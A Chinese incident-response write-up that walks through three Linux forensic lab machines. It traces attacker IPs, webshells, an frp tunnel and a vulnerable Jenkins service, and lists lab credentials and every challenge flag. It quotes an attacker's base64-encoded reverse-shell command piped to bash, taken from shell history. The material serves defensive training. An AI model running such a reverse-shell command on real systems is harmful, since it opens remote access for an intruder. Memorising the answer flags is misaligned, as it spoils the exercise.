靶机应急 | 知攻善防----Linux
靶场下载地址:https://mp.weixin.qq.com/s/opj5dJK7htdawkmLbsSJiQ
Linux应急靶场-linux1
前景:
- 小王急匆匆地找到小张,小王说"李哥,我dev服务器被黑了",快救救我!!
题目:
- 1、黑客的IP地址
- 2、遗留下的三个flag
- 账号-密码:defend/defend root/defend
第一个flag:
- 首先我们登录系统后,发现是一个Centos系统
- 查看当前用户是否拥有SUDO权限--sudo -l
- 可以看到能执行任何命令,我们切换root用户,su -
- 查看操作历史找到第一个flag:flag{thisismybaby}
第二个flag:
- 同时也发现攻击者修改了rc.local文件,去查看一下
- cat /etc/rc.d/rc.local,找到第二个flag--flag{kfcvme50}
第三个flag:
- 查看用户信息--less /etc/passwd。发现存在redis用户
- 有一个公钥,但是没有看到flag
- cd /root/.ssh
- ls -a
- cat authorized_keys
- 倒是看到了攻击者的名称
- 查看redis的配置文件--cat /etc/redis.conf。在开头找到第三个flag:flag{P@ssW0rd_redis}
- 查看用户信息--less /etc/passwd。发现存在redis用户
攻击者IP:
- 查看redis的日志信息(redis服务器的日志保存位置为/var/log/redis/redis.log)
- 在里面找到了攻击者的IP--192.168.75.129
- linux1-结束!!!
Linux应急靶场-linux2
前景:
- 看监控的时候发现webshell告警,领导让你上机检查你可以救救安服仔吗!!
题目:
- 1、提交攻击者IP
- 2、提交攻击者修改的管理员密码(明文)
- 3、提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)
- 4、提交Webshell连接密码
- 5、提交数据包的flag1
- 6、提交攻击者使用的后续上传的木马文件名称
- 7、提交攻击者隐藏的flag2
- 8、提交攻击者隐藏的flag3
- 账号-密码:root/Inch@957821.
提交攻击者IP:
- 打开靶机,登录后发现有流量包。
- 关闭防火墙--systemctl stop firewalld,使用Xshell进行SSH连接--账号-密码:root/Inch@957821.
- 将流量包下载到本地进行分析
- 打开后在搜索框输入http
- 看流量包,源IP为192.168.20.1,目的是192.168.20.144。是192.168.20.1 向192.168.20.144发送POST请求,而192.168.20.144则是响应请求。
- 统计一下最近登录的IP--grep "Accepted" /var/log/secure* | awk '{print $1.$2,$3,$9,$11}'
- 确定攻击者IP为--192.168.20.1
- 打开靶机,登录后发现有流量包。
提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)&提交Webshell连接密码:
- 在流量包中筛选192.168.20.1的流量--http and ip.src==192.168.20.1
- 右键查看HTTP查看,就会有所发现
- 使用的连接工具为蚁剑,并且密码是--Network2020。存在的漏洞路径为--/index.php?user-app-register
- 在流量包中筛选192.168.20.1的流量--http and ip.src==192.168.20.1
提交攻击者使用的后续上传的木马文件名称:
- 发现上传的文件名称为version2.php
- 继续找发现了明显的冰蝎php webshell特征
- 在24流中发现目录信息,判断shell.php和version2.php谁先上传的(1、数据流越大越晚 2、根据目录信息和version2.php(换成北京时间)上传的信息对比时间)
- 所以后续上传的木马文件名称为--version2.php
- 发现上传的文件名称为version2.php
三个flag:
- 继续寻找数据流,在20时发现flag1--flag1{Network@_2020_Hack}
- 查看历史发现,修改过者两个文件
- 通过history命令,发现攻击者在环境变量中写入了第三个flag3,并且攻击者在/www/wwwroot/127.0.0.1/中创建了文件夹.api隐藏文件,然后复制了api下的文件,并修改了其中的两个文件。查看一下。
- 也可以直接看到flag3--flag3{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
- 查看两个文件的位置
- find / -name mpnotify.* 2>/dev/null
- find / -name alinotify.* 2>/dev/null
- 查看攻击者创建的文件--cat /www/wwwroot/127.0.0.1/.api/alinotify.php
- 找到flag2--flag2 = "flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}"
- 继续寻找数据流,在20时发现flag1--flag1{Network@_2020_Hack}
提交攻击者修改的管理员密码(明文):
- 查看端口服务--netstat -antlp
- 查看是否有可疑进程--top
- Web 攻击 payload 排查,发现访问过PhpMyAdmin
- 发现运行着BT
- 输入bt,编号14,找到地址信息
- 但是不知道密码需要修改密码,输入5编号
- 将密码设置为123456。访问页面进行登录
- 登录后点击数据库,得到登录账号和密码
- 登录PhpMyAdmin
- 查询数据库kaoshi,在第二页找到 x2_user 表
- 进行MD5解密https://www.somd5.com/?action=getpwd
- Linux2-结束!!!
Linux应急靶场-easy溯源
前景:
- 小张是个刚入门的程序猿,在公司开发产品的时候突然被叫去应急,小张心想"早知道简历上不写会应急了",于是call了运维小王的电话,小王说"你面试的时候不是说会应急吗?伪造简历吗?真该死。"
题目:
- 1、攻击者内网跳板机IP地址
- 2、攻击者服务器地址
- 3、存在漏洞的服务(提示:7个字符)
- 4、攻击者留下的flag(格式zgsf{})
- 5、攻击者邮箱地址
- 6、攻击者的ID名称
- 账号-密码:zgsfsys/zgsfsys(root用户也是这个密码)
攻击者内网跳板机IP地址:
- 打开终端查看历史命令--history
- 看到命令--println "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjEyOS8xMjM0IDA+JjE= | base64 --decode | bash ".execute().text
- 解码base64编码的数据--YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjEyOS8xMjM0IDA+JjE=
- 攻击者内网跳板机IP地址--192.168.11.129
- 打开终端查看历史命令--history
攻击者服务器地址:
- 用户提权sudo -i到root,输入zgsfsys
- 进入到chuantou,执行ls。发现frpc
- 查看配置文件--cat frpc.toml
- 攻击者服务器地址--156.66.33.66
存在漏洞的服务(提示:7个字符)&攻击者留下的flag(格式zgsf{})
- 打开桌面上的txt文件
- 三个网站是bt、程序员小破绽、论坛
- 查看流量器记录发现Jenkins的网站,并且找到了flag--zgsf{gongzhonghaozhigongshanfangshiyanshi}
- flag在这那有漏洞的服务就为--Jenkins(7个字符)
- 打开桌面上的txt文件
- 后续的溯源因为github上的厂库被删了所以也无法溯源
- easy溯源-结束!!!